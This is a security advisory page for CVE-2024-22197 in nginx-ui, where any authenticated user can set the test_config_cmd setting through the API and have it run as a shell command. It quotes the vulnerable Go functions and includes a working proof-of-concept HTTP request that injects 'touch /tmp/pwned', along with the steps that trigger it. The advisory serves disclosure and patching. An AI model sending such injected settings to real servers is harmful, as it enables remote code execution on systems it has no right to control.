Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1weG1yLXEyeDMtOXg5bc4AA4Y4
Authenticated (user role) remote command execution by modifying `nginx` settings (GHSL-2023-269)
Summary
The Home > Preference page exposes a small list of nginx settings such as Nginx Access Log Path and Nginx Error Log Path. However, the API also exposes test_config_cmd, reload_cmd and restart_cmd. While the UI doesn't allow users to modify any of these settings, it is possible to do so by sending a request to the API.
func InitPrivateRouter(r *gin.RouterGroup) {
r.GET("settings", GetSettings)
r.POST("settings", SaveSettings)
...
}
The SaveSettings function is used to save the settings. It is protected by the authRequired middleware, which requires a valid JWT token or a X-Node-Secret which must equal the Node Secret configuration value. However, given the lack of authorization roles, any authenticated user can modify the settings.
The SaveSettings function is defined as follows:
func SaveSettings(c *gin.Context) {
var json struct {
...
Nginx settings.Nginx `json:"nginx"`
...
}
...
settings.NginxSettings = json.Nginx
...
err := settings.Save()
...
}
The test_config_cmd setting is stored as settings.NginxSettings.TestConfigCmd. When the application wants to test the nginx configuration, it uses the TestConf function:
func TestConf() (out string) {
if settings.NginxSettings.TestConfigCmd != "" {
out = execShell(settings.NginxSettings.TestConfigCmd)
return
}
out = execCommand("nginx", "-t")
return
}
The execShell function is defined as follows:
func execShell(cmd string) (out string) {
bytes, err := exec.Command("/bin/sh", "-c", cmd).CombinedOutput()
out = string(bytes)
if err != nil {
out += " " + err.Error()
}
return
}
Where the cmd argument is user-controlled and is passed to /bin/sh -c.
This issue was found using CodeQL for Go: Command built from user-controlled sources.
Proof of Concept
Based on this setup using
uozi/nginx-ui:v2.0.0-beta.7.
- Login as a newly created user.
- Send the following request to modify the settings with
"test_config_cmd":"touch /tmp/pwned".
POST /api/settings HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 528
Authorization: <<JWT TOKEN>
Content-Type: application/json
{"nginx":{"access_log_path":"","error_log_path":"","config_dir":"","pid_path":"","test_config_cmd":"touch /tmp/pwned","reload_cmd":"","restart_cmd":""},"openai":{"base_url":"","token":"","proxy":"","model":""},"server":{"http_host":"0.0.0.0","http_port":"9000","run_mode":"debug","jwt_secret":"foo","node_secret":"foo","http_challenge_port":"9180","email":"foo","database":"foo","start_cmd":"","ca_dir":"","demo":false,"page_size":10,"github_proxy":""}}
- Add a new site in
Home > Manage Sites > Add Sitewith random data. The previously-modifiedtest_config_cmdsetting will be used when the application tries to test the nginx configuration. - Verify that
/tmp/pwnedexists.
$ docker exec -it $(docker ps -q) ls -al /tmp
-rw-r--r-- 1 root root 0 Dec 14 21:10 pwned
Impact
This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure.
Permalink: https://github.com/advisories/GHSA-pxmr-q2x3-9x9mJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1weG1yLXEyeDMtOXg5bc4AA4Y4
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 11 months ago
Updated: 11 months ago
CVSS Score: 7.7
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
Identifiers: GHSA-pxmr-q2x3-9x9m, CVE-2024-22197
References:
- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m
- https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3
- https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/router.go#L13
- https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18
- https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45
- https://nvd.nist.gov/vuln/detail/CVE-2024-22197
- https://github.com/advisories/GHSA-pxmr-q2x3-9x9m
Blast Radius: 1.0
Affected Packages
go:github.com/0xJacky/Nginx-UI
Dependent packages: 0Dependent repositories: 0
Downloads:
Affected Version Ranges: < 2.0.0.beta.9
Fixed in: 2.0.0.beta.9
All affected versions:
All unaffected versions: 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.3.0, 1.3.1, 1.3.2, 1.4.0, 1.4.1, 1.4.2, 1.5.0, 1.5.1, 1.5.2, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.5, 1.6.6, 1.6.7, 1.6.8, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.7.5, 1.7.6, 1.7.7, 1.7.8, 1.7.9, 1.8.0, 1.8.1, 1.8.2, 1.8.3, 1.8.4, 1.9.9